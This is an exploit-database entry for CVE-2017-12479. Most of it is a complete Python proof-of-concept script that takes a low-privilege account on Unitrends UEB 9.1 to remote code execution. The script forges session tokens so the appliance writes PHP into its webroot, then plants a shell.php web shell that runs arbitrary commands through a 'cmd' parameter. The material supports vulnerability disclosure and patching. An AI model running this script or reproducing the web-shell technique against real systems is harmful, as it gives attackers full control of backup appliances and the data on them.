Unitrends UEB 9.1 Privilege Escalation

2017.10.06
Credit: Multiple
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-264


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: Authenticated lowpriv RCE for Unitrends UEB 9.1 # Date: 08/08/2017 # Exploit Authors: Benny Husted, Jared Arave, Cale Smith # Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413 # Vendor Homepage: https://www.unitrends.com/ # Software Link: https://www.unitrends.com/download/enterprise-backup-software # Version: 9.1 # Tested on: CentOS6 # CVE: CVE-2017-12479 import httplib import urllib import ssl import sys import base64 import random import time import string import json from optparse import OptionParser # Print some helpful words: print """ ############################################################################### Authenticated lowpriv RCE for Unitrends UEB 9.1 Tested against appliance versions: [+] 9.1.0-2.201611302120.CentOS6 This exploit utilizes some issues in UEB9 session handling to place a php exec one liner in the webroot of the appliance. Session tokens looks like this: djA6NmM0ZWMzYTEtZmYwYi00MTIxLTk3YzYtMjQzODljM2EyNjY1OjE6L3Vzci9icC9sb2dzLmRpci9ndWlfcm9vdC5sb2c6MA== and decodes to this: LOG_LVL ----, v --- UUID ----------------------- v v -- LOG_DIR -----------v v v0:6c4ec3a1-ff0b-4121-97c6-24389c3a2665:1:/usr/bp/logs.dir/gui_root.log:0 The general steps that are followed by this poc are: 1. Authenticate as a low priv user and receive an auth token. 2. Modify the LOG_DIR field to point to a directory in the web root with apache user write access, and make a request to an arbitrary resource. This should touch a new file at the desired location. 3. Replace the UUID token in this auth token with a php shell_exec on liner, and modify the LOG_LVL parameter to a value of 5, which will ensure that the UUID is reflected into the log file. 4. Issue a final request, to generate a shell.php file with a single shell_exec. This step is not strictly necessary. ############################################################################### """ # Disable SSL Cert validation if hasattr(ssl, '_create_unverified_context'): ssl._create_default_https_context = ssl._create_unverified_context # Parse command line args: usage = "Usage: %prog -r <appliance_ip> -u <username> -p <password>\n"\ parser = OptionParser(usage=usage) parser.add_option("-r", '--RHOST', dest='rhost', action="store", help="Target host w/ UNITRENDS UEB installation") parser.add_option("-u", '--username', dest='username', action="store", help="User with any amount of privilege on unitrends device") parser.add_option("-p", '--password', dest='password', action="store", help="password for this user") (options, args) = parser.parse_args() if not options.rhost: parser.error("[!] No remote host specified.\n") elif options.rhost is None or options.username is None or options.password is None: parser.print_help() sys.exit(1) RHOST = options.rhost username = options.username password = options.password ################################################################ # REQUEST ONE: GET A UUID. ################################################################ url1 = '/api/login' a = {"username" : username, "password" : password} post_body = json.dumps(a) headers1 = {'Host' : RHOST} print "[+] Attempting to log in to {0}, {1}:{2}".format(RHOST, username, password) conn = httplib.HTTPSConnection(RHOST, 443) conn.set_debuglevel(0) conn.request("POST", url1, post_body, headers=headers1) r1 = conn.getresponse() ################################################################ # BUILD THE AUTH TOKENS THAT WE'LL USE IN AN ATTACK. ################################################################ parsed_json = json.loads(r1.read()) if 'auth_token' not in parsed_json: print "[!] Didn't receive an auth token. Bad creds?" exit() auth_encoded = parsed_json['auth_token'] auth_decoded = base64.b64decode(auth_encoded) uuid = auth_decoded.split(':')[1] ssid = auth_decoded.split(':')[2] # We'll place our command shell in /var/www/html/tempPDF, since apache # has rw in this dir. log_dir = "/var/www/html/tempPDF/" log_file = ''.join(random.choice(string.ascii_lowercase) for _ in range(5)) + '.php' log_lvl = "5" shell = "<?php echo shell_exec($_GET['cmd']);?> >" auth_mod1 = "v0:{0}:{1}:{2}{3}:{4}".format(uuid, ssid, log_dir, log_file, log_lvl) auth_mod2 = "v0:{0}:{1}:{2}{3}:{4}".format(shell, ssid, log_dir, log_file, log_lvl) auth_mod1 = base64.b64encode(auth_mod1) auth_mod2 = base64.b64encode(auth_mod2) url2 = '/api/summary/current/' ################################################################ # REQUEST 2: PUT A FILE ################################################################ print "[+] Making a request to place log to http://{0}/tempPDF/{1}".format(RHOST, log_file) headers2 = {'Host' : RHOST, 'AuthToken' : auth_mod1} # touch the file conn.request("GET", url2, headers=headers2) r2 = conn.getresponse() print "[+] Making request to reflect shell_exec php to {0}.".format(log_file) headers3 = {'Host' : RHOST, 'AuthToken' : auth_mod2} # make the first command time.sleep(.5) conn.request("GET", url2, headers=headers3) conn.close() # optional cleanup time print "[+] Making a request to generate clean shell_exec at http://{0}/tempPDF/shell.php".format(RHOST) url4 = '/tempPDF/' + log_file url4 += '?cmd=echo+-e+"<?php%20echo%20shell_exec(\$_GET[%27cmd%27]);?>"+>+shell.php' conn1 = httplib.HTTPSConnection(RHOST, 443) conn1.request("GET", url4, headers=headers2) r3 = conn1.getresponse() conn1.close() url5 = "/tempPDF/shell.php" print "[+] Checking for presence of http://{0}{1}".format(RHOST, url5) headers3 = {'Host' : RHOST} conn2 = httplib.HTTPSConnection(RHOST, 443) conn2.request("GET", url5, headers=headers2) r3 = conn2.getresponse() if r3.status == 200: print "[+] Got a 200 back. We did it." print "[+] Example cmd: http://{0}{1}?cmd=id".format(RHOST, url5) else: print "Got a {0} back. Maybe this didn't work.".format(r3.status) print "Try RCE here http://{0}/tempPDF/{1}?cmd=id".format(RHOST, log_file) conn2.close() # 3. Solution: # Update to Unitrends UEB 10


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top